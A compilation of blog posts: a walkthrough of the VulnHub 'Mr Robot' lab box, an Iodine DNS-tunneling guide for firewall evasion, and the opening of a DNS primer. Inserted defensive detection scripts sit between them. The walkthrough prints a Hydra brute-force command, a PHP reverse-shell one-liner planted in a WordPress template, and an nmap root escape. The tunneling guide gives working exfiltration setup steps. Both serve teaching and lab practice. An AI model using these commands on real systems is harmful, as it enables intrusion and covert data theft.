Mr Robot

Hello Friend, thank you for coming to haxez. I love the show Mr Robot, it’s probably one of my all-time favorite shows (along with the X-Files and House). Not only is it a realistic hacking drama but it’s also a psychological thriller with some crazy moments. So, today we’re going to channel our inner hacktivist and join up with fsociety to bring down the global conglomerate that is Evil Corp. That’s right, we’re going to be hacking our way into the Mr Robot box on VulnHub created by Leon Johnson.

Mr Robot Set Up

In order to hack this box, you will first need to download it from VulnHub. Once the box has been downloaded you will then need to import it into your Virtual Machine Hypervisor software. I’m going to be using VirtualBox for this and it’s as simple as clicking ‘File > Import Appliance’ and then navigating to the file you downloaded. It may take a couple of minutes but once it’s done, power it up along with your hacking Virtual Machine.

VirtualBox Mr Robot Set Up

Mr Robot VirtualBox Network Setup

Firstly, you want to check your Host Network Manager settings. This can be done in VirtualBox by ‘File > Host Network Manager’. Take a look at your network settings and make note of the IPv4 address.

VirtualBox Network Set Up

Once you have the host network address, check that DHCP is enabled. Then, head to the network settings of both your hacking machine and your target machine. Check that both of the machines have Adapter 1 set to host only and that the name of the adapter is the same. If you want you can enable the second adapter on Kali and set it to NAT so that you still have internet access.

VirtualBox Host Network Set Up

Finding Mr Robot

Hopefully, finding Mr Robot won’t be too difficult now that we have our network settings configured correctly. First, you can use a tool called netdiscover which can either passively detect online hosts or search for them by sending ARP requests. This can be quite noisy but I thought it was worth mentioning. We know the host-only network is 192.168.56.0/24 so let’s ask netdiscover to explore that range.

Netdiscover

sudo netdiscover -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP              At MAC Address      Count  Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1    0a:00:27:00:00:0b   1      60   Unknown vendor
192.168.56.100  08:00:27:71:14:50   1      60   PCS Systemtechnik GmbH
192.168.56.101  08:00:27:db:36:79   1      60   PCS Systemtechnik GmbH

As you can see, three hosts respond. One is our default gateway with the IP address of 192.168.56.1, one is our own machine, and the other is the target machine. We will have to work out which one is which in a moment.

Ping Sweep

Our second method for finding the host is to perform a ping sweep against the network. As you can see from the terminal output below, it has found the same hosts. So we now know that the target host is either 192.168.56.100 or 192.168.56.101. Let’s perform some reconnaissance to figure out which is which.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sP 192.168.56.0/24
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-30 07:39 EDT
Nmap scan report for 192.168.56.1
Host is up (0.00015s latency).
MAC Address: 0A:00:27:00:00:0B (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00036s latency).
MAC Address: 08:00:27:71:14:50 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up (0.00038s latency).
MAC Address: 08:00:27:DB:36:79 (Oracle VirtualBox virtual NIC)
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.02 seconds

Mr Robot Reconnaissance

In order to work out which one our target is, we can perform a port scan on both IP addresses. The services listening on the IP addresses should tell us which one we need to attack. All I’m doing in the scan below is running a TCP scan against all ports. This is usually fairly quick and should give us everything we need. We could do far more complex scans but for now, let’s work out which box is which.

┌──(kali㉿kali)-[/media/sf_OneDrive/VulnHub/MrRobot/Tooloutput]
└─$ sudo nmap -sT -p0- 192.168.56.100
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-30 08:00 EDT
Nmap scan report for 192.168.56.100
Host is up (0.00012s latency).
All 65536 scanned ports on 192.168.56.100 are in ignored states.
Not shown: 65536 filtered tcp ports (proto-unreach)
MAC Address: 08:00:27:71:14:50 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 15.35 seconds

Not a lot going on here. This is probably my machine as there won’t be many services running.

┌──(kali㉿kali)-[/media/sf_OneDrive/VulnHub/MrRobot/Tooloutput]
└─$ sudo nmap -sT -p0- 192.168.56.101
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-30 08:01 EDT
Nmap scan report for 192.168.56.101
Host is up (0.0014s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https
MAC Address: 08:00:27:DB:36:79 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 125.66 seconds

We have a closed SSH port and a web server listening on ports 80 and 443. That definitely isn’t my machine, so it is likely our target.

Exploring The Mr Robot Web Server

We know that ports 80 and 443 are open so let’s go check them out in our browser. Just grab the IP address and pop it in your browser with either HTTP:// or HTTPS:// at the beginning. The website emulates a Linux terminal with a number of options. Going through these options doesn’t appear to give us much but is pretty cool for immersion. I suggest going through them.

Mr Robot Web Server

Busting Directories

Since the website didn’t offer us much that we could use to progress, it’s time to brute force its directories and files to see if we can find anything interesting. There are a number of tools out there that can do this but I’m going to keep it simple and use dirb. The output of dirb is quite significant so I will only include a small section here.

┌──(kali㉿kali)-[/media/sf_OneDrive/VulnHub/MrRobot/Tooloutput]
└─$ sudo dirb https://192.168.56.101                     
-----------------
DIRB v2.22    
By The Dark Raver
-----------------
START_TIME: Sat Apr 30 08:23:20 2022
URL_BASE: https://192.168.56.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612                                                          
---- Scanning URL: https://192.168.56.101/ ----
+ https://192.168.56.101/robots.txt (CODE:200|SIZE:41)
==> DIRECTORY: https://192.168.56.101/0/
==> DIRECTORY: https://192.168.56.101/admin/
==> DIRECTORY: https://192.168.56.101/audio/
==> DIRECTORY: https://192.168.56.101/blog/
==> DIRECTORY: https://192.168.56.101/css/
==> DIRECTORY: https://192.168.56.101/feed/
==> DIRECTORY: https://192.168.56.101/wp-admin/

Mr robots.txt

As can be seen from the output above, we have a number of interesting files and directories. The first file I want to look at is the robots.txt file. In essence, the robots.txt file is a file that tells search engines what not to index. If you have login pages on your website then you would include them in the robots.txt file to ensure they don’t get indexed by search engines. Let’s take a look at it at http://192.168.56.101/robots.txt

User-agent: *
fsocity.dic
key-1-of-3.txt

Mr Robot First Key

It looks like we have our first flag or key. Navigate to the http://192.168.56.101/key-1-of-3.txt file and you should receive the following key: 073403c8a58a1f80d943455fb30724b9. It also appears that we have a dictionary file, perhaps a word list that we can use to attempt to gain access to the machine. Let’s check it out at http://192.168.56.101/fsocity.dic. The file will automatically download but you can cat it once it has downloaded.

Mr Robot Wordlist

Admin Area

My suspicions were correct, it is a large wordlist. We could try and brute force SSH with it or the admin area of the website. Since we found it on the website I think we should start there. The first admin area found by dirb was https://192.168.56.101/admin but visiting that has a constant redirect loop on it. However, it also found a WordPress admin area.

Mr Robot WordPress Login

Enumerating Valid Users

Interestingly, when attempting to log into the portal with admin:admin I am informed that I’m using an invalid username. This is a common tactic used in web application penetration testing to enumerate users. If the error messages for submitting an incorrect username and a correct username with an incorrect password are different, then we can enumerate the correct users. First, let’s sort out the wordlist so it only has unique entries.

┌──(kali㉿kali)-[/media/sf_OneDrive/VulnHub/MrRobot/Tooloutput]
└─$ sort /home/kali/Downloads/fsocity.dic | uniq > robodic.txt

Burp Suite

There are many different tools out there capable of brute-forcing web applications and Burp Suite is probably a bit overkill for this task. However, I know how to use Burp and find it really intuitive so I’m going to stick with what I know. With the proxy on, I will capture a login request and send it to the intruder. There I will clear the existing positions and add my own to the log parameter.

Burp Suite

I will then load the fsociety.dic file into the payloads and start the attack.

Burp Suite Intruder

Within a matter of moments, we can see that the user Elliot has a different response length from the rest of the responses. This suggests that the error message being sent back is different from that of the rest of the users.

Hydra

The error message is different; as you can see, it is saying that the password for the user Elliot is incorrect. So now that we know our username, it’s time to find our password and in order to do that, we’re going to use a different tool called Hydra.

hydra -vV -l elliot -P robotdic.txt 192.168.56.101 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'
[ATTEMPT] target 192.168.56.101 - login "elliot" - pass "even" - 5656 of 11452 [child 9]
[ATTEMPT] target 192.168.56.101 - login "elliot" - pass "Even" - 5657 of 11452 [child 7]
[ATTEMPT] target 192.168.56.101 - login "elliot" - pass "evening" - 5658 of 11452 [child 11]
[ATTEMPT] target 192.168.56.101 - login "elliot" - pass "event" - 5659 of 11452 [child 12]
[ATTEMPT] target 192.168.56.101 - login "elliot" - pass "events" - 5660 of 11452 [child 5]
[80][http-post-form] host: 192.168.56.101 login: elliot password: ER28-0652
[STATUS] attack finished for 192.168.56.101 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-30 09:58:12

Bingo, we have found his password from the fsociety.dic file.
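From the defender’s side, the Burp and Hydra runs above leave a very recognisable trail in the web server’s access log: a burst of POSTs to /wp-login.php from one address, nearly all answered with HTTP 200 (WordPress re-renders the form on a failed login and only redirects with 302 on success), and two distinct response sizes for the failures, which is the “invalid username” versus “incorrect password” difference that made the enumeration possible. The following is an added example, not code from the original post: it parses combined-format log lines, flags login bursts per client, and reports whether the failure responses come in more than one size. The log lines, the client address 192.168.56.102 and the timestamps are constructed.

```python
"""Spot wp-login.php password guessing and username enumeration in
Apache/Nginx combined-format access logs (added example, not from the post)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: six failed logins in three seconds from one client, one
# success, plus ordinary traffic from a second client.
SAMPLE_LOG = """\
192.168.56.102 - - [30/Apr/2022:09:57:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3891
192.168.56.102 - - [30/Apr/2022:09:57:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3891
192.168.56.102 - - [30/Apr/2022:09:57:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3891
192.168.56.102 - - [30/Apr/2022:09:57:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3891
192.168.56.102 - - [30/Apr/2022:09:57:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3891
192.168.56.102 - - [30/Apr/2022:09:57:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3912
192.168.56.102 - - [30/Apr/2022:09:57:04 +0000] "POST /wp-login.php HTTP/1.1" 302 0
192.168.56.50 - - [30/Apr/2022:09:57:05 +0000] "GET /blog/ HTTP/1.1" 200 14023
192.168.56.50 - - [30/Apr/2022:09:58:10 +0000] "POST /wp-login.php HTTP/1.1" 302 0
"""


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def is_failed_login(rec):
    """WordPress answers a failed login with 200 (form + error) and a success with 302."""
    return (rec["method"] == "POST"
            and rec["path"].startswith("/wp-login.php")
            and rec["status"] == 200)


def detect_bursts(log_text, window_s=60, threshold=5):
    """Map client IP -> largest number of failed logins seen inside any window."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_failed_login(rec):
            by_ip[rec["ip"]].append(rec["ts"])
    alerts = {}
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):            # sliding window over sorted timestamps
            while times[end] - times[start] > timedelta(seconds=window_s):
                start += 1
            if end - start + 1 >= threshold:
                alerts[ip] = max(alerts.get(ip, 0), end - start + 1)
    return alerts


def failure_sizes(log_text):
    """Map client IP -> sorted distinct sizes of failed-login responses.
    More than one size means the client is receiving different error pages,
    i.e. the username-enumeration oracle is live."""
    sizes = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_failed_login(rec):
            sizes[rec["ip"]].add(rec["size"])
    return {ip: sorted(s) for ip, s in sizes.items()}


if __name__ == "__main__":
    print("bursts:", detect_bursts(SAMPLE_LOG))
    print("failure sizes:", failure_sizes(SAMPLE_LOG))
```

Rate limiting or lockout on wp-login.php removes the burst, and returning one generic "invalid credentials" message for both cases removes the size difference; either check is cheap to keep running against the live log.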

Popping Shells

Now we need to get on the box. The simplest way to do this is to add some code to one of the WordPress templates. The easiest is probably going to be the 404 template because you can then call any non-existing page to execute the code. Modify the following code with your own IP address and add it to the top of the WordPress 404 template.

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.102/443 0>&1'");
?>
WordPress 404 Template

Now, in your terminal create a listener on port 443 using NetCat.

┌──(kali㉿kali)-[/media/sf_OneDrive/VulnHub/MrRobot/Tooloutput]
└─$ sudo nc -lvp 443
listening on [any] 443 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 37398
daemon@linux:/opt/bitnami/apps/wordpress/htdocs$ ls

Lateral Movement

Looking in the home directory we can see there is a user called ‘robot’. Furthermore, there are two files in this user’s home directory. One is the second key and the other is what appears to be a password md5. Unfortunately, we can’t read the key file due to the permissions but we can read the password file.

daemon@linux:/opt/bitnami/apps/wordpress/htdocs$ ls -laSh /home/robot
ls -laSh /home/robot
total 16K
drwxr-xr-x 2 root root 4.0K Nov 13 2015 .
drwxr-xr-x 3 root root 4.0K Nov 13 2015 ..
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt

If we cat this file we can see that it is the md5 hash for the user robot. If we crack this hash then we should be able to switch to the robot user.

daemon@linux:/opt/bitnami/apps/wordpress/htdocs$ cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

Now, we could crack this hash using Hashcat or John The Ripper. However, it has likely already been cracked so let’s check out crackstation.net. Indeed the hash has already been cracked and the password is abcdefghijklmnopqrstuvwxyz… right.
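The reason crackstation answers instantly is that password.raw-md5 holds a single fast, unsalted MD5: anyone with a precomputed table of common strings can look it up. The block below is an added example, not code from the original post. It verifies the hash shown above against the recovered plaintext, shows the lookup as a dictionary of precomputed hashes, and contrasts it with a salted, iterated PBKDF2 hash of the same password, which cannot be answered from any shared table. The candidate list is constructed.

```python
"""Raw MD5 versus a salted, iterated hash (added example, not from the post)."""
import hashlib
import os

ROBOT_HASH = "c3fcd3d76192e4007dfb496cca67e13b"   # contents of password.raw-md5 above

# Constructed stand-in for a wordlist.
CANDIDATES = ["password", "123456", "robot", "mrrobot",
              "abcdefghijklmnopqrstuvwxyz", "fsociety"]


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def lookup_raw_md5(target_hex, candidates):
    """Precompute-then-lookup: the same idea as a rainbow table, at toy scale.
    Works because the stored hash has no salt and MD5 is cheap."""
    table = {md5_hex(c): c for c in candidates}
    return table.get(target_hex.lower())


def hash_password(password, rounds=100_000):
    """Store 'salt_hex$hash_hex'; a fresh 16-byte salt per password means no
    two users (and no two table builders) share a hash for the same string."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored, rounds=100_000):
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), rounds)
    # Constant-time comparison so the check itself leaks nothing.
    return hashlib.compare_digest(digest.hex(), digest_hex) if hasattr(hashlib, "compare_digest") \
        else __import__("hmac").compare_digest(digest.hex(), digest_hex)


def salted_hashes_differ(password):
    """Same password hashed twice gives two different strings: a table built
    for one salt says nothing about the other."""
    return hash_password(password) != hash_password(password)


if __name__ == "__main__":
    print(lookup_raw_md5(ROBOT_HASH, CANDIDATES))
    stored = hash_password("abcdefghijklmnopqrstuvwxyz")
    print(stored, verify_password("abcdefghijklmnopqrstuvwxyz", stored))
```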

Mr Robot Crackstation

TTY Shell

Trying to switch to ‘robot’ in our current shell will produce an error saying we need to be in a terminal. In order to resolve this issue, we need to spawn a TTY shell.

daemon@linux:/opt/bitnami/apps/wordpress/htdocs$ python -c 'import pty; pty.spawn("/bin/sh")'        
$ su robot
Password: abcdefghijklmnopqrstuvwxyz

Now that we have switched to ‘robot’ we can capture the key in our home directory.

robot@linux:/opt/bitnami/apps/wordpress/htdocs$ cat /home/robot/key-2-of-3.txt
822c73956184f694993bede3eb39f959

Privilege Escalation

In order to escalate our privileges to root, we need to find a program that can elevate us. This is normally possible due to a file having the suid bit set. You can find files with the suid bit set by running the following command.

robot@linux:/opt/bitnami/apps/wordpress/htdocs$ find / -perm /4000 -type f 2>/tmp/2                 
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
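The find command above is exactly the check a defender should be running on a schedule, with the extra step of diffing the result against a known-good baseline so that an out-of-place setuid binary such as /usr/local/bin/nmap is reported rather than buried in the list. The block below is an added example, not code from the original post: is_suid mirrors what find -perm /4000 -type f matches, scan_suid walks the usual binary directories, and audit diffs a list of paths against a baseline. The baseline is constructed from the find output above with nmap left out; tune it per build.

```python
"""SUID baseline audit (added example, not from the post)."""
import os
import stat

# Constructed baseline: the setuid files the find output above lists, minus nmap.
EXPECTED_SUID = frozenset({
    "/bin/ping", "/bin/ping6", "/bin/mount", "/bin/umount", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo",
})

# Constructed input: the paths find returned on the Mr Robot box above.
MR_ROBOT_SUID = [
    "/bin/ping", "/bin/umount", "/bin/mount", "/bin/ping6", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/local/bin/nmap",
]


def is_suid(mode):
    """True for a regular file with the set-user-ID bit, i.e. what
    `find -perm /4000 -type f` matches."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def scan_suid(roots=("/bin", "/sbin", "/usr", "/opt")):
    """Walk roots and return every SUID regular file. lstat is used so a
    symlink to a setuid binary is not counted twice."""
    found = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for fname in files:
                path = os.path.join(dirpath, fname)
                try:
                    st = os.lstat(path)
                except OSError:          # unreadable or vanished entry
                    continue
                if is_suid(st.st_mode):
                    found.append(path)
    return sorted(found)


def audit(found, expected=EXPECTED_SUID):
    """Diff the observed SUID set against the baseline. 'unexpected' is the
    list to investigate; 'missing' usually means a package was removed."""
    found = set(found)
    return {"unexpected": sorted(found - expected),
            "missing": sorted(expected - found)}


if __name__ == "__main__":
    print(audit(scan_suid()))
```

Run from cron and alert on a non-empty "unexpected" list; on this box the only entry would be /usr/local/bin/nmap, which is the binary the next section abuses.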

We can see from the output that one of these files is Nmap and older versions of Nmap had an interactive mode that you could use to escape to root. As you can see from the tool output below, we can use Nmap interactive mode to escape to root and capture the final key.

robot@linux:~$ nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# whoami
root
# ls
key-2-of-3.txt password.raw-md5
# cd /root
# ls
firstboot_done key-3-of-3.txt
# cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

Firewall Evasion with DNS Tunneling

Hello World and welcome to haxez. Today I want to talk about the DNS tunneling software Iodine. Or more specifically I want to talk about data exfiltration and firewall evasion via DNS encapsulation. If you haven’t read my article on DNS then I strongly recommend giving that a quick read-through beforehand.

Scenario

Envision a scenario where you’ve successfully socially engineered your way into a super-secret evil organization. You’ve bypassed physical security and have found a sneaky corner office with an ethernet port. You plug your laptop into the network and the DHCP server assigns you an IP address. Next, you compromise a host and attempt to ping your external Command and Control center (C2). You ping your domain name. The ping returns the correct IP address for your domain name but your pings all time out… what do you do?

Solution

Why would ping be able to resolve your domain name’s IP address but not be able to ping it? Other than the obvious ICMP packets being blocked, it could be that the network administrator has blocked all traffic except DNS. This is a common configuration to allow DNS resolution on the network, but fortunately, it is also susceptible to abuse. By using the DNS tunneling software Iodine, we can establish a tunnel to an external host and use it as a proxy to the internet.

Initial Set Up

In order to perform this type of attack, you will need an external server capable of running Iodine. Iodine should be compatible with most Linux distributions but for this demonstration, I’m going to be using a Debian-based cloud server. Furthermore, you will also need your own domain name and access to edit the DNS records for that domain. Finally, you will need a Linux machine to launch your attack. As you can see from the screenshot below, my IP address is currently set to 37.120.198.179 (it’s a VPN before you ask).

Pre Iodined What Is My IP

Iodine DNS Configuration

For this demonstration, I’m going to be using my spare domain haxr.one. It is currently registered with Google and is using their nameservers. I don’t use the domain for anything, I bought it on a whim and am now deciding to do something with it. In order for Iodine to work, we need to create some records so that the Iodine server and client can communicate. As you can see from the screenshot below, I have created an A record of dnstunip which points to my Debian server’s IP address of 185.132.43.9. I then created an NS (nameserver) record of dnstun and pointed it to the A record (dnstunip.haxr.one).

Iodine Domain Name DNS Configuration

Iodine Server Configuration

On Debian, Iodine can be installed by simply running apt-get install iodine. That’s it, that’s all the installation you need to do unless Iodine isn’t found in the repositories. If that happens, you can clone it directly from the GitHub repository, which has documentation on how to do that. Once Iodine is installed you need to tell it to start listening for DNS queries for your domain. In order to do this, you need to run iodined (the server-side software). As you can see from the screenshot below I have started iodined and set the password of SecretPassword1337, the local IP address of 10.0.0.1, and the domain of dnstun.haxr.one. The local IP address is the IP address that the DNS tunnel is going to use to communicate with the client.

sudo iodined -f -c -P SecretPassword1337 10.0.0.1 dnstun.haxr.one
Iodine Server Configuration

You should now be able to check that your Iodine server is set up correctly by visiting https://code.kryo.se/iodine/check-it/ and popping in your domain name.

Iodine Server Check

Iodine Client Configuration

Once you have the server running, head back to your client and with sudo, run:

sudo iodine -f -P SecretPassword1337 dnstun.haxr.one

Where the password is your password and the dnstun.haxr.one is your domain. This will then send DNS queries to the server to determine whether it can communicate with it. The client and server will then determine the upstream and downstream configurations and finally create the tunnel. The client should now have a new network interface called dns0 or something similar. The IP address of that interface will be set to an IP within the range that you specified on the server (10.0.0.X). That’s it, you now have a connection to the server. You can SSH into it and communicate with the outside world.

Iodine Client Configuration

It’s also worth launching Wireshark and watching the DNS traffic being sent and received. It is quite bizarre seeing the length of some of the requests and responses. You can see from the screenshot below that the DNS traffic isn’t normal. However, Wireshark doesn’t seem to think there is a problem with it and unless there are devices on the network configured to look for this type of traffic then it probably won’t get flagged.

Wireshark PCAP

The Cherry On Top

Ok, but what if you want to browse the internet while you have this DNS tunnel established? There’s an SSH trick for that. If you SSH to the DNS tunnel server’s IP address (10.0.0.1) and specify a few arguments, you can dynamically port forward traffic to your localhost. This means that by setting a proxy configuration in your browser to localhost and the specified port, you can browse the web. The command is:

sudo ssh -N -D 9090 <user>@10.0.0.1

where <user> is your account on the server, 10.0.0.1 is the server’s DNS tunnel IP address and 9090 is the local port you want to forward to. The -N argument just means no command execution and the -D argument is the dynamic port forwarding flag that makes the magic happen.

SSH Dynamic Port Forwarding

Iodine Browser Configuration

Once that’s done, you can head to your browser’s proxy settings and manually configure a SOCKS proxy on the specified port. Save the changes and you should now be able to browse the web. As you can see from the screenshot below, I have created the SOCKS proxy and when visiting the what is my IP website, it tells me that my IP address is now the IP address of our Debian cloud server.

Setting Up Browser SOCKS Proxy
Iodined What Is My IP

DNS Concerns

So why is this a problem? Well, it’s using DNS to exfiltrate data out of an otherwise restricted network. There are plenty of places such as banks, prisons, and other government facilities where internet access might be restricted for genuine reasons. These places do not want sensitive information to escape their network. Banks don’t want their clients’ data stolen, prisons don’t want their inmates communicating with the outside world and governments don’t want their secrets leaked. Additionally, if a hacker were able to implant an easily concealed device into a network it could act as a backdoor into that network. This is also how some malware communicates back to the command and control center to receive instructions.

DNS Mitigations

How do you mitigate a service that is behaving as it is expected to? Well, there are actually a number of options. First, you could add domain allow and block lists to your configuration. By blocking known malicious domain names, you ensure that a DNS tunnel can’t be established to that domain name. However, a hacker could just register a new domain name and use that. A better approach is to use an allow list whereby only traffic from specific domains is allowed into the network.

An even better approach is to implement a device that performs traffic/packet inspection. There are a number of devices out there that will identify malicious DNS traffic and block it. You saw from the Wireshark screenshots that the DNS tunnel traffic stands out like a sore thumb. It is easily distinguishable from genuine DNS traffic.
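The Wireshark observation above (the tunnel traffic looks nothing like normal DNS, yet nothing flags it unless something is configured to look) and the inspection-device mitigation both come down to a few measurable properties of the query names: total length, label length, the entropy of the subdomain part, use of bulk-carrying record types such as NULL or TXT, and the sheer number of such queries aimed at one registrable domain. The block below is an added example, not code from the original post or from the Iodine project: it scores each query against those heuristics and flags domains that receive many suspicious queries. The sample queries are constructed, the tunnel-shaped labels are random base32 strings (not real Iodine encoding), and the two-label "registrable domain" shortcut is an assumption a real deployment would replace with the Public Suffix List.

```python
"""Heuristic DNS-tunnel detection over a list of (qname, qtype) pairs
(added example, not from the post or the Iodine project)."""
import math
import random
from collections import Counter, defaultdict

BASE32 = "abcdefghijklmnopqrstuvwxyz234567"


def shannon_entropy(s):
    """Bits per character of s; 0 for the empty string."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def registrable_domain(qname):
    # Assumption: the last two labels are the registrable domain. Real code
    # should use the Public Suffix List (this shortcut mishandles co.uk etc.).
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def query_reasons(qname, qtype):
    """Return the heuristics one query trips; an empty list means 'looks normal'."""
    labels = qname.rstrip(".").split(".")
    subdomain = "".join(labels[:-2])
    reasons = []
    if len(qname) > 100:
        reasons.append("name longer than 100 chars")
    if max(len(label) for label in labels) > 40:
        reasons.append("label longer than 40 chars")
    if shannon_entropy(subdomain) > 4.0:          # ~4.8 bits/char for random base32
        reasons.append("high-entropy subdomain")
    if qtype in ("NULL", "TXT", "PRIVATE"):       # types that carry large payloads
        reasons.append("bulk-capable record type")
    return reasons


def flag_tunnel_domains(queries, min_reasons=2, min_count=20):
    """Group by registrable domain and flag those receiving at least min_count
    queries that each trip at least min_reasons heuristics. The volume
    threshold keeps one odd TXT lookup from raising an alert."""
    suspicious = defaultdict(int)
    for qname, qtype in queries:
        if len(query_reasons(qname, qtype)) >= min_reasons:
            suspicious[registrable_domain(qname)] += 1
    return {dom: n for dom, n in suspicious.items() if n >= min_count}


# Constructed sample: ordinary lookups plus 25 tunnel-shaped NULL queries
# under a made-up tunnel zone. Labels are random base32, not Iodine output.
_rng = random.Random(1337)


def _fake_tunnel_query():
    labels = ["".join(_rng.choice(BASE32) for _ in range(55)) for _ in range(2)]
    return (".".join(labels) + ".dnstun.haxr.one.", "NULL")


SAMPLE_QUERIES = [
    ("www.google.com.", "A"), ("mail.haxez.org.", "MX"), ("ns1.google.com.", "AAAA"),
    ("haxez.org.", "TXT"), ("cdn.haxez.org.", "A"),
] + [_fake_tunnel_query() for _ in range(25)]


if __name__ == "__main__":
    for dom, n in flag_tunnel_domains(SAMPLE_QUERIES).items():
        print(f"{dom}: {n} tunnel-shaped queries")
```

Thresholds are deliberately conservative; a CDN or anti-spam service does emit long, high-entropy names, so in practice the per-domain volume and a per-client rate are what separate tunnels from legitimate oddities.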

DNS Conclusions

I thought this was a fantastic technique when I first came across it. A colleague/friend of mine recommended it to me while I was on an engagement and sure enough, it worked. I was shocked as I didn’t think it would be possible to encode data like that into DNS queries. You can have a full-blown conversation with another computer by smuggling it through DNS.

DNS Simplified

Hello world, and welcome to haxez. Today I want to talk about the Domain Name System (DNS). I know, I know, most of you probably already know how DNS works. However, I’m going to be writing an article soon about Firewall Evasion and Data Exfiltration through DNS Tunnelling and I needed to brush up on my DNS knowledge. Never wanting to waste an opportunity, I thought it would make for a good blog post and video so here we are.

What is DNS?

Domain Name System or DNS is a hierarchical system for translating human-readable names to IP addresses. It relies on various nameservers at various levels. A nameserver is a server that holds records for domains, whether they are top-level domains (TLD) or fully qualified domains (FQDN). At the very top of the hierarchy are the root servers. These root servers hold the DNS record information for the top-level domains. This information is stored in something called a zone file. You can perform a DNS zone transfer using various tools. The example below is using Nmap.

sudo nmap --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=zonetransfer.me -p53 nsztm1.digi.ninja
DNS Zone File

The zone file contains entries such as the nameservers for the top-level domains. Underneath the root nameservers are the top-level domain nameservers. The same principle applies here in that the top-level domain nameservers contain information about the fully qualified domain nameservers. At the bottom of the hierarchy is the domain’s authoritative nameservers which contain records such as A, MX, NS, TXT, and many others.

DNS is a hierarchical system

Domain Structure

If we look at the web address haxez.org we can see that it has multiple sections. You may not know about the first section as it doesn’t tend to be represented by anything. In some cases, it can be represented by a full stop but most Domain Name System nameservers don’t require the full stop in order for it to work. The full stop comes at the end of the ‘.ORG’ section and signifies a root nameserver. Root nameservers hold the IP addresses of the top-level domain (TLD) nameservers (COM, NET, ORG, and so on). The ‘ORG’ section of the address is a top-level domain. The ‘haxez’ portion of the address is the domain. Anything that comes before haxez.org would be a subdomain. For example, in www.haxez.org, www is the subdomain and haxez.org is the fully qualified domain.

Domain Structure

How Does The DNS Work?

When you type a URL into your browser a number of things happen. Using various online resources I’ve broken it down into 10 steps. I’ve overly simplified the process but there is a lot more going on such as caching, virtual host magic, TCP handshakes, and GET requests.

  1. The client queries the DNS resolver for the location of the domain name.
  2. The DNS resolver queries a root nameserver for the location of the top-level domain (.COM, .ORG, .CO.UK, .NET) nameserver.
  3. The root nameserver responds to the DNS resolver with the IP address of the top-level domain nameserver.
  4. The DNS resolver then queries the top-level domain nameserver for the location of the domain’s authoritative nameserver.
